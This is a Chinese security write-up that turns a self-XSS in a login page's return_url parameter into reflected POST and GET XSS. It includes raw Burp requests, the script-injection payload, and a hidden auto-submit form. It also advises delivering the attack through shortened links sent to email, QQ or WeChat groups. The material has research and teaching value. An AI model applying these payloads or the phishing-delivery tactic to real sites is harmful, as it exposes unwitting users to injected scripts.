目录
-
反射型 Self-XSS
-
POST 反射型 XSS
-
GET 反射型 XSS
反射型 Self-XSS
开局登录框
随机输入,然后burp抓包
POST /membership_login.asp HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
return_url=&account=x&password=x&login=
发现一枚比较"陌生"的参数
-
return_url
fuzz一波
得到payload
"><script>alert(2021)</script>
即
POST /membership_login.asp HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
return_url="><script>alert(2021)</script>&account=x&password=x&login=
响应如下
成功xss 自己
但总不能一枚self-xss就结束了吧?
POST-反射型 XSS
F12, 查看源码
构造post表单
xssPost.html:
<html>
<body>
<form action="http://www.xxx.com/membership_login.asp" method="POST">
<input type="hidden" name="return_url" value=""><script>alert(2021)</script>" />
<input type="hidden" name="account" value="x" />
<input type="hidden" name="password" value="x" />
<input type="hidden" name="login" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
诱导目标访问这个html文件,触发如下:
如果是在日常攻防演练中,可以将该html部署在vps, 然后生成短链接后再进行投递,如:
起一个web服务
生成短链接
然后模拟投递该短链接(邮箱/QQ群/微信群等)
成功触发
虽然,针对POST 型XSS的利用已经较为成熟,但是如果能进化为GET 型XSS自然最好。
GET-反射型XSS
初始登录时的数据如下
POST /membership_login.asp HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
Accept-Encoding
: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
return_url=&account=x&password=x&login=
右键,改变请求方式
GET 请求包
GET /membership_login.asp?return_url="><script>alert(2021)</script>&account=x&password=x&login= HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
Accept-Encoding
: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
响应如下
成功弹窗
常规利用同POST 型XSS一样,将携带payload的链接丢短链接在线生成网站
然后将生成的链接投递即可,触发如下:
本文始发于微信公众号(don9sec):一枚进击中的Self-XSS
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论